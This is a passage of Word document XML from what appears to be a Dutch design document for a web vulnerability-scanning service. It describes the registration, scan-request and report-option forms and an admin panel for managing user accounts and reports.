              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253198336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4AE11CB9" wp14:editId="6D26E4D2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>8374380</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4080510</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="889000" cy="347980"/>
                <wp:effectExtent l="0" t="0" r="0" b="7620"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="774" name="Text Box 774"/>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23CED" w14:textId="143E558D" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="0075098B">
                            <w:r>
                              <w:t>Figuur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11CB9" id="Text Box 774" o:spid="_x0000_s1074" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:659.4pt;margin-top:321.3pt;width:70pt;height:27.4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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6C523CED" w14:textId="143E558D" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="0075098B">
                      <w:r>
                        <w:t>Figuur 4.5</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253196288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="18169A81" wp14:editId="52642A9C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>8375015</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1918335</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="889000" cy="347980"/>
                <wp:effectExtent l="0" t="0" r="0" b="7620"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="773" name="Text Box 773"/>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AD880" w14:textId="621B5A7A" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Figuur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69A81" id="Text Box 773" o:spid="_x0000_s1075" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:659.45pt;margin-top:151.05pt;width:70pt;height:27.4pt;z-index:2531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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="291AD880" w14:textId="621B5A7A" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Figuur 4.4</w:t>
                      </w:r>
                    </w:p>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E2204E" w:rsidRPr="00AC3FAA" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00AC3FAA">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Registratie</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="18265A93" w14:textId="6AAA7D03" w:rsidR="00E2204E" w:rsidRPr="007066FB" w:rsidRDefault="00E2204E">
                            <w:r w:rsidRPr="007066FB">
                              <w:t>Met het registratieformulier kunnen gebruikers zichzelf registreren om een account aan te maken.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="298AC4C4" w14:textId="12739B71" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>De standaardvelden email en URL worden door Pandora meegegeven en hoeven niet ingevuld te worden.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="24B6C36B" w14:textId="126C3385" w:rsidR="00E2204E" w:rsidRPr="007066FB" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t xml:space="preserve">Het veld alternatieve e-mailadres kan de gebruiker invullen als hij de standaard emailadres van het Wordpress account niet wilt gebruiker. </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7617A9EC" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="007066FB" w:rsidRDefault="00E2204E"/>
                          <w:p w14:paraId="0250B685" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="007066FB" w:rsidRDefault="00E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76"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="64A6D813" w14:textId="01198638" w:rsidR="00E2204E" w:rsidRPr="00AC3FAA" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00AC3FAA">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Registratie</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="18265A93" w14:textId="6AAA7D03" w:rsidR="00E2204E" w:rsidRPr="007066FB" w:rsidRDefault="00E2204E">
                      <w:r w:rsidRPr="007066FB">
                        <w:t>Met het registratieformulier kunnen gebruikers zichzelf registreren om een account aan te maken.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="298AC4C4" w14:textId="12739B71" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>De standaardvelden email en URL worden door Pandora meegegeven en hoeven niet ingevuld te worden.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="24B6C36B" w14:textId="126C3385" w:rsidR="00E2204E" w:rsidRPr="007066FB" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t xml:space="preserve">Het veld alternatieve e-mailadres kan de gebruiker invullen als hij de standaard emailadres van het Wordpress account niet wilt gebruiker. </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7617A9EC" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="007066FB" w:rsidRDefault="00E2204E"/>
                    <w:p w14:paraId="0250B685" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="007066FB" w:rsidRDefault="00E2204E"/>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E2204E" w:rsidRDefault="00E2204E" w:rsidP="00E85184">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00AC3FAA">
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Aanvraag scan (standaard)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0A660C76" w14:textId="021DB586" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00E85184">
                            <w:r>
                              <w:t xml:space="preserve">Met het standaard aanvraagformulier kunnen gebruikers enkel een soort scan aanvragen met de volgende specificaties: </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="19203743" w14:textId="03F4CC73" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00542A1C">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>-Quick Scan</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="60AAF175" w14:textId="18FE0D9E" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00542A1C">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>-Short Report</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="53B7C69B" w14:textId="599ED8B0" w:rsidR="00E2204E" w:rsidRPr="008B659F" w:rsidRDefault="00E2204E"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77"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="603B2513" w14:textId="5C051D7D" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00E85184">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00AC3FAA">
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Aanvraag scan (standaard)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0A660C76" w14:textId="021DB586" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00E85184">
                      <w:r>
                        <w:t xml:space="preserve">Met het standaard aanvraagformulier kunnen gebruikers enkel een soort scan aanvragen met de volgende specificaties: </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="19203743" w14:textId="03F4CC73" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00542A1C">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>-Quick Scan</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="60AAF175" w14:textId="18FE0D9E" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00542A1C">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>-Short Report</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="53B7C69B" w14:textId="599ED8B0" w:rsidR="00E2204E" w:rsidRPr="008B659F" w:rsidRDefault="00E2204E"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E2204E" w:rsidRDefault="00E2204E">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78"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="480B0804" w14:textId="79E9E453" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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E7123"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E2204E" w:rsidRDefault="00E2204E">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79"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="51B95B3F" w14:textId="68051AD7" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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449B"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E2204E" w:rsidRDefault="00E2204E">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80"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1WHsCAABl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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3723EA36" w14:textId="18E11F9F" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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06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F8C1D"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D8A00"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7261D"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E2204E" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>Scan opties</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2E4224DF" w14:textId="393798DF" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>-Full scan</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="543BC038" w14:textId="24F07B6E" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>-Blind SQL</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="003ABEFC" w14:textId="38BBEB53" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>-SQL</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3FA4B2F2" w14:textId="1C3FAA1E" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>-XSS</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2C71BA31" w14:textId="516E0801" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>-Quick Scan</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="30652807" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="64D55890" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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81"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="44B295DD" w14:textId="3A8D3D47" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>Scan opties</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2E4224DF" w14:textId="393798DF" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>-Full scan</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="543BC038" w14:textId="24F07B6E" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>-Blind SQL</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="003ABEFC" w14:textId="38BBEB53" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>-SQL</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3FA4B2F2" w14:textId="1C3FAA1E" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>-XSS</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2C71BA31" w14:textId="516E0801" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>-Quick Scan</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="30652807" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="64D55890" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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E2204E" w:rsidRDefault="00E2204E" w:rsidP="00BC1E78">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>Rapport opties</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="72AB97F5" w14:textId="0244AB9B" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00BC1E78">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>-Full Report</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3BF18F49" w14:textId="1F78169A" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00BC1E78">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>-Short Report</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2D943ECD" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"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82"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1EC1C6F6" w14:textId="0E998152" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00BC1E78">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>Rapport opties</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="72AB97F5" w14:textId="0244AB9B" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00BC1E78">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>-Full Report</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3BF18F49" w14:textId="1F78169A" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00BC1E78">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>-Short Report</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2D943ECD" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"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46DE7"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144C2"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DCF2"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8258A"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5443B"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01D07"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E2204E" w:rsidRDefault="00E2204E">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83"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3A85EF96" w14:textId="40FB18FA" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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EE1B2"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AA3CB"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E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Beschrijving van standaard aanvraag</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6A87BF23" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="003B15E4" w:rsidRDefault="00E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84"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0395060A" w14:textId="72BBDBE1" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Beschrijving van standaard aanvraag</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6A87BF23" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="003B15E4" w:rsidRDefault="00E2204E"/>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5AEB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6DD34"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FCC0"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E2204E" w:rsidRDefault="00E2204E"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85"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="119784AE" w14:textId="17A4BF1D" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"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3F593"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023DB"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E2204E" w:rsidRPr="000A1B8C" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rP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86"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="38CC5ACF" w14:textId="0285DE5D" w:rsidR="00E2204E" w:rsidRPr="000A1B8C" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rP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E2204E" w:rsidRPr="00211DCB" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rP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87"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="25FFE659" w14:textId="771484F4" w:rsidR="00E2204E" w:rsidRPr="00211DCB" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Bedrijf</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C98B1"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E2204E" w:rsidRPr="00211DCB" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>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88"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4BFB0FA2" w14:textId="2A73B159" w:rsidR="00E2204E" w:rsidRPr="00211DCB" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>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90F83"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495F3"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6A7BD"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77F4"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3E391"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DC245"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915DA"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B4071"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E2204E" w:rsidRDefault="00E2204E" w:rsidP="00E85184">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00C406BD">
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Aanvraag scan (Premium)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4FD2E7F9" w14:textId="130B6887" w:rsidR="00E2204E" w:rsidRPr="00B568D8" w:rsidRDefault="00E2204E"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89"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3FAF7615" w14:textId="6AD38645" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00E85184">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00C406BD">
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Aanvraag scan (Premium)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4FD2E7F9" w14:textId="130B6887" w:rsidR="00E2204E" w:rsidRPr="00B568D8" w:rsidRDefault="00E2204E"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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC3B3AD" w14:textId="77777777" w:rsidR="00E85184" w:rsidRPr="00A754AF" w:rsidRDefault="00E85184" w:rsidP="00A754AF">
      <w:pPr>
        <w:sectPr w:rsidR="00E85184" w:rsidRPr="00A754AF" w:rsidSect="00241096">
          <w:headerReference w:type="first" r:id="rId55"/>
          <w:pgSz w:w="16838" w:h="11906" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="1417" w:bottom="0" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6354E118" w14:textId="2EF5C96D" w:rsidR="00B568D8" w:rsidRDefault="008A4128" w:rsidP="00B568D8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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923A7"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4.3 Admin Paneel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C580A16" w14:textId="18AD1046" w:rsidR="00DD4D16" w:rsidRDefault="00DD4D16"/>
    <w:p w14:paraId="42FF73D0" w14:textId="3D4C3759" w:rsidR="004756DF" w:rsidRDefault="00C819BF">
      <w:r>
        <w:t>Het doel van de admin panee</w:t>
      </w:r>
      <w:r w:rsidR="00B249DE">
        <w:t>l is om het</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gebruikersbestand te onderhouden. De administrator kan met de admin paneel data over de geregistreerde gebruikersaccounts ophalen in een tabel en deze upgraden naar premium. Ook kan er data over de gegenereerde rapporten opgehaald worden, mocht er een rapport niet succesvol verstuurd zijn kan dat via de admin paneel nogmaals gedaan worden.</w:t>
      </w:r>
      <w:r w:rsidR="00B249DE">
        <w:t xml:space="preserve"> Ook beschikt de admin paneel ove</w:t>
      </w:r>
      <w:r w:rsidR="0031747F">
        <w:t xml:space="preserve">r een inlogsysteem zo kunnen </w:t>
      </w:r>
      <w:r w:rsidR="00B249DE">
        <w:t>meerdere administrators</w:t>
      </w:r>
      <w:r w:rsidR="0031747F">
        <w:t xml:space="preserve"> er </w:t>
      </w:r>
      <w:r w:rsidR="00B249DE">
        <w:t>geb</w:t>
      </w:r>
      <w:r w:rsidR="0031747F">
        <w:t>ruik van maken.</w:t>
      </w:r>
      <w:r w:rsidR="0075098B" w:rsidRPr="0075098B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA638B9" w14:textId="69C00AAC"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79DFF240">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D1B3"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E2204E" w:rsidRDefault="00E2204E">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90"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="00DD4706" w14:textId="7E18E822" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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E2204E" w:rsidRDefault="00E2204E">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91"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="435BF8CF" w14:textId="358D4F17" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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E2204E" w:rsidRDefault="00E2204E">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92"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BlaEUd4AgAAZAUAAA4AAAAA&#10;AAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhADQeoPHdAAAACQEAAA8A&#10;AAAAAAAAAAAAAAAA0AQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADaBQAAAAA=&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="056582C5" w14:textId="62443B83" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Admin</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6B649F" w14:textId="2C8E8C9B"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D03AF47">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196F0"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3401A1E8"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30C6162C">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E2204E" w:rsidRPr="004756DF" w:rsidRDefault="00E2204E">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93"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7ECB1CDC" w14:textId="5F9E0915" w:rsidR="00E2204E" w:rsidRPr="004756DF" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004756DF">
                        <w:rPr>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Accountscherm</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="296EAF62" w14:textId="06BD315F"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r>
              <w:t>www.onlinetennisshop.nl</w:t>
            </w:r>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r>
              <w:t>email</w:t>
            </w:r>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actief]</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76F20"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6FC1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E2204E" w:rsidRPr="002B4F92" w:rsidRDefault="00E2204E">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94"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lgHsCAABl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BsYKWAewIAAGUFAAAO&#10;AAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQDU0yhO3gAAAAoB&#10;AAAPAAAAAAAAAAAAAAAAANMEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA3gUAAAAA&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5C69E3D5" w14:textId="34B95754" w:rsidR="00E2204E" w:rsidRPr="002B4F92" w:rsidRDefault="00E2204E">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E2204E" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:rPr>
                                <w:sz w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:sz w:val="16"/>
                              </w:rPr>
                              <w:t>Knop waarmee premiumaccount wordt geactiveerd</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="227A759E" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="009833D6" w:rsidRDefault="00E2204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95"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M61kvx6AgAAZQUAAA4A&#10;AAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhANjVwPPeAAAACQEA&#10;AA8AAAAAAAAAAAAAAAAA0gQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADdBQAAAAA=&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="78D71850" w14:textId="3A8FCEB3" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:t>Knop waarmee premiumaccount wordt geactiveerd</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="227A759E" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="009833D6" w:rsidRDefault="00E2204E">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Pdf bestand</w:t>
            </w:r>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verzonden</w:t>
            </w:r>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verzend]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3CE3348B" w14:textId="7E9E2AE1" w:rsidR="00B568D8" w:rsidRDefault="0075098B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253204480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5402914E" wp14:editId="135C03A4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-203200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3891915</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="889000" cy="347980"/>
                <wp:effectExtent l="0" t="0" r="0" b="7620"/>
                <wp:wrapSquare wrapText="bothSides"/>
